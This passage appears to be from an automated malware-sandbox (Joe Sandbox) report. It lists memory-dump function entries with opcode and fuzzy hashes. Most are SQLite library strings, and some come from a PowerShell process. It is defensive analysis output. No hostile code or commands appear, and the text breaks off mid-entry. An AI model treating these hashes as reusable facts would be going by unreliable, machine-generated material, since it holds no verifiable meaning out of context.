                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                        • API String ID: 0-3418467682
                                                        • Opcode ID: 692b6681af643018bed6e177934dcf0e75464141baee9d3c90cf30845b12c46b
                                                        • Instruction ID: 4e8ec298330edff1a3559f414f3a9f1045a2fdd9188c84c566002e5492f9dd5d
                                                        • Opcode Fuzzy Hash: 692b6681af643018bed6e177934dcf0e75464141baee9d3c90cf30845b12c46b
                                                        • Instruction Fuzzy Hash: 1AA14432E0E2D1AAD724CB1994546BDBBA2EB81BD1F084135DB8B43786DF3CE545C724
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s-shm$readonly_shm$winOpenShm
                                                        • API String ID: 4149376297-2815843928
                                                        • Opcode ID: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
                                                        • Instruction ID: fc533d192b786425c224c86841f1e456359d3a596a27bf92acfca88c9deb6778
                                                        • Opcode Fuzzy Hash: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
                                                        • Instruction Fuzzy Hash: 85C15A25B0BA42A7FF64AB61E4586B833A0FF48BD4F045675DA5E43690EF3CE444C368
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                        • API String ID: 4149376297-3418467682
                                                        • Opcode ID: a4c113993474cc49555c3d143fb20371f08dc39ed5c52e61a988b440176aaf0e
                                                        • Instruction ID: d7c0e415ece1a7b0b6eadf2e8e48ac7c1d5db3e89b4ba258bb18e822c6513dea
                                                        • Opcode Fuzzy Hash: a4c113993474cc49555c3d143fb20371f08dc39ed5c52e61a988b440176aaf0e
                                                        • Instruction Fuzzy Hash: D3812663A5E2D169E321CA25A0505BA3EE0E7117E5F05413AEECA473C1EB3CC986D728
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                        • API String ID: 4149376297-2063813899
                                                        • Opcode ID: 07cb2e7851a56338389ab05e0a161e4c4c89749a912260004fa4f3a15ea2c57c
                                                        • Instruction ID: a6fa306b402ed154504b9ec1668ffcc99e526dd5bbf5671da3933047751c3df6
                                                        • Opcode Fuzzy Hash: 07cb2e7851a56338389ab05e0a161e4c4c89749a912260004fa4f3a15ea2c57c
                                                        • Instruction Fuzzy Hash: 0191F1B2A0AB8192EB50CF15A014AB977A5FF89BC0F899235DE8D47785EF3CE451C314
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true
                                                        • Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007C6126570
                                                        • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                        • API String ID: 800424832-87138338
                                                        • Opcode ID: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
                                                        • Instruction ID: cbc2d1b081dac8b81c005812da731f8893ac2f06f4d2350e394629a0866d8021
                                                        • Opcode Fuzzy Hash: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
                                                        • Instruction Fuzzy Hash: A4617D72B0AE026EEB60CA15A80067E7252FF90BD0F449231EA6D437D5DF3CE421CB14
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                        • API String ID: 4149376297-3418467682
                                                        • Opcode ID: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
                                                        • Instruction ID: 73638cfe8ead88fdf1d4166283dcdf07bca08541b9026912a72ebe0c4ba1b773
                                                        • Opcode Fuzzy Hash: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
                                                        • Instruction Fuzzy Hash: 5551CE3270AB42A6FB54CB25E549AA973A4FB48BC8F086032DF4D43754EF79E851C318
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                        • API String ID: 4149376297-3418467682
                                                        • Opcode ID: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                        • Instruction ID: 89ec2cfeab9e83a2dcf34cb2ff04a8338baca004db55ddcb7b864c2abe4eb53a
                                                        • Opcode Fuzzy Hash: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                        • Instruction Fuzzy Hash: 2541C132A2A74592EB608F15E0442B973A5FB84BD0F542035EB8D17798DF7CD901CB54
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2333738469.00007FF8A8091000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A8090000, based on PE: true
                                                        • Associated: 00000002.00000002.2333694134.00007FF8A8090000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A80F2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A813E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8142000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A8147000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2333738469.00007FF8A81A7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334161636.00007FF8A81A8000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                        • Associated: 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a8090000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
                                                        • Instruction ID: f7288314af067362d91f0a091716ce699769590acabd034ea94e3c70b3bfd10e
                                                        • Opcode Fuzzy Hash: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
                                                        • Instruction Fuzzy Hash: 09111C36B15F0199EB008B61E8552A933A4FB597A8F440931DA6D86BA4DF7CD168C390
                                                        APIs
                                                        • 00007FF8BA251730.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FF8A878BC0B), ref: 00007FF8A8788FBB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: BINARY$out of memory
                                                        • API String ID: 4149376297-3971123528
                                                        • Opcode ID: bc6f2a8bacecf9166252a7f7e7f55d6c87e171d9e6f9b78f67373de005e7e5be
                                                        • Instruction ID: 824e2e7b92a7ba1e411f4e80c8043137eed6890c0d35355f2b7e4b1b226b78a3
                                                        • Opcode Fuzzy Hash: bc6f2a8bacecf9166252a7f7e7f55d6c87e171d9e6f9b78f67373de005e7e5be
                                                        • Instruction Fuzzy Hash: E8F1F372A4A686AAEB60CF15D4007B93BA1FB54BC4F444032DB8D47794EF3CE5A5C724
                                                        APIs
                                                        • 00007FF8BA251730.VCRUNTIME140(?,?,?,00000000,?,00007FF8A878BCA6,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF8A878B676
                                                        • 00007FF8BA251730.VCRUNTIME140(?,?,?,00000000,?,00007FF8A878BCA6,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF8A878B6DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: %s.xBestIndex malfunction
                                                        • API String ID: 4149376297-3856629991
                                                        • Opcode ID: 6031e0d52f8e623814c5ff78df03ce2a13dc1a347239105b5b64f6607da1d5c6
                                                        • Instruction ID: 1b0a286a8272be5082826dd9c55fc1a58f4ddcccbd4917e0e160aa38e86e917d
                                                        • Opcode Fuzzy Hash: 6031e0d52f8e623814c5ff78df03ce2a13dc1a347239105b5b64f6607da1d5c6
                                                        • Instruction Fuzzy Hash: FDE1BF72A4AB52A6EB668F29D48077837A0FB48BD4F040136DA4D43764DF3CE4E1C768
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: out of memory$too many levels of trigger recursion
                                                        • API String ID: 4149376297-3387558265
                                                        • Opcode ID: 779609525df14a454e6d8bc5e939ef047970eeec53fade6c015cf47684a8258e
                                                        • Instruction ID: a427a51cd0af2d5ba76333f14472412334adcdb438eff7e1d2535aebe8bc2108
                                                        • Opcode Fuzzy Hash: 779609525df14a454e6d8bc5e939ef047970eeec53fade6c015cf47684a8258e
                                                        • Instruction Fuzzy Hash: 80713876A06B4596DB60CF19E484A6D77E8FB48784F164036DF8D83B60EF38E091C754
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A86E0000, based on PE: true
                                                        • Associated: 00000002.00000002.2336678449.00007FF8A86E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A8838000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A883A000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2336728144.00007FF8A884F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337386431.00007FF8A8851000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8a86e0000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: 00007A251730
                                                        • String ID: cannot use RETURNING in a trigger$sqlite_returning
                                                        • API String ID: 4149376297-753984552
                                                        • Opcode ID: 90345514c6722d7a683a32098103f8e468254a001aa006cc10f1c1805ec09e79
                                                        • Instruction ID: 4041ac1a9a6ddf7edd20b79cc31e5ead3a4cf42e23bbba9ad0a0eee8b6f45572
                                                        • Opcode Fuzzy Hash: 90345514c6722d7a683a32098103f8e468254a001aa006cc10f1c1805ec09e79
                                                        • Instruction Fuzzy Hash: E9414131A8AB81A6EB699B65E5403B973A0FB48BC0F444131DBDE07756DF3CE461C329
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 517ac9ebafce8b1c2b0735db7932b62ebe372f6a1262cfd0e749afc413252754
                                                        • Instruction ID: e0d7d9a8b4dbfe919e9625e06d5d3de5eb801c0955b743428f28138ce5a12b30
                                                        • Opcode Fuzzy Hash: 517ac9ebafce8b1c2b0735db7932b62ebe372f6a1262cfd0e749afc413252754
                                                        • Instruction Fuzzy Hash: 61524432A0DB899FF396AA3C68551B97FE1EF56760B0A01FBC04CC7593ED189C068356
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50bd76e1ff203ba439e03cf1f24e654266c042c9e0a407bd05ea42792136a90e
                                                        • Instruction ID: 2142e1ef14caa2b78a598e959da18c134fe20357bcc393212f3e43f01fad38da
                                                        • Opcode Fuzzy Hash: 50bd76e1ff203ba439e03cf1f24e654266c042c9e0a407bd05ea42792136a90e
                                                        • Instruction Fuzzy Hash: A2D13031F1EA8ADFF7AAAB2858545B97FE1EF06390F0905BED04CCB193D918AC018355
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3720870565de6f33cd03cc74158ae80d299c9d3afee50a65c23bc44c0e252e7d
                                                        • Instruction ID: acd48fbec08dab437b6e0298e75f193c65e11daee86c9c9e1e569945c80503b0
                                                        • Opcode Fuzzy Hash: 3720870565de6f33cd03cc74158ae80d299c9d3afee50a65c23bc44c0e252e7d
                                                        • Instruction Fuzzy Hash: B741842290E7C58FD713AB3858754E83FB0EE9315874E05E7C8D8CF0A3E958582AC766
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7dec1822aa0fa9463e5cb5f9a0453694be2d30947f7fc30775cc5a626aa1c094
                                                        • Instruction ID: 7adb8b6c4a9f1ab3d77550d243fd185227a5c9e1170f596855022df489bfbcf8
                                                        • Opcode Fuzzy Hash: 7dec1822aa0fa9463e5cb5f9a0453694be2d30947f7fc30775cc5a626aa1c094
                                                        • Instruction Fuzzy Hash: EB31953191CB4C9FDB58DB5CA8466B97BE0FB99721F00422FE449D3252CB71A8558BC2
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0674f290082d72ce9d936ea8e0e0617bd12cbef028d9b127581c639b87678686
                                                        • Instruction ID: 61399bfd152981237698ab5b086e2164b1477c9ea858c65d88d3dff0cb55d751
                                                        • Opcode Fuzzy Hash: 0674f290082d72ce9d936ea8e0e0617bd12cbef028d9b127581c639b87678686
                                                        • Instruction Fuzzy Hash: B221063090CB8C8FDB59EB6C9C4A7E97FF0EB66321F04416BD448C3152DA74A45ACB91
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2288851948.00007FF84769D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84769D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff84769d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e55ef372afc8a0db17cc58a1afa4ea44d51d28f5b7f3922efe40924750b4db6f
                                                        • Instruction ID: 8d6f39d3aa1fb2c29eeb851de2b90ba2b9adb0e5d668c46a3b54997ab4b8e1d3
                                                        • Opcode Fuzzy Hash: e55ef372afc8a0db17cc58a1afa4ea44d51d28f5b7f3922efe40924750b4db6f
                                                        • Instruction Fuzzy Hash: A401A23260CE08CFDAA8EB3DE48599677D1FB44364B1045AFD049CB1A6DA21F886CB81
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                        • Instruction ID: 85808c2e6323d8f6b725429c4d996abc9f77871a40faad45032824a30f62a7d4
                                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                        • Instruction Fuzzy Hash: 8001677111CB0C8FD744EF0CE451AB6B7E0FB95364F50056DE58AC3655DA36E882CB45
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e4fcb8c0089d593290028162b72d85ebfd221b8b74f7f9395bf90c80268880e
                                                        • Instruction ID: 16a8ba9a8ec9f7960eceec9845f2ac8abec2a86868200111ab0ff30a4fa6aa91
                                                        • Opcode Fuzzy Hash: 7e4fcb8c0089d593290028162b72d85ebfd221b8b74f7f9395bf90c80268880e
                                                        • Instruction Fuzzy Hash: 2AF0303275C6044FDB4CAA1CF8429B573D1E799335B10026EE48BC2697D927E8438686
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2290788437.00007FF8477B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8477B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff8477b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b7e8708c4b441f2dde0b16e2d5b963ad3475aaeb78a056e98a051b9a0a1d4d2
                                                        • Instruction ID: 89436d23a75a4ff406aa4a5aafaa1fcf8df88dc4b7995b8208d4ed20eb695e66
                                                        • Opcode Fuzzy Hash: 5b7e8708c4b441f2dde0b16e2d5b963ad3475aaeb78a056e98a051b9a0a1d4d2
                                                        • Instruction Fuzzy Hash: 41F0A03275C6088FDB4CAA0CF8029B873D0EB99320B10412EE48BC2297D927E8428685
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2293193566.00007FF847880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847880000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7ff847880000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
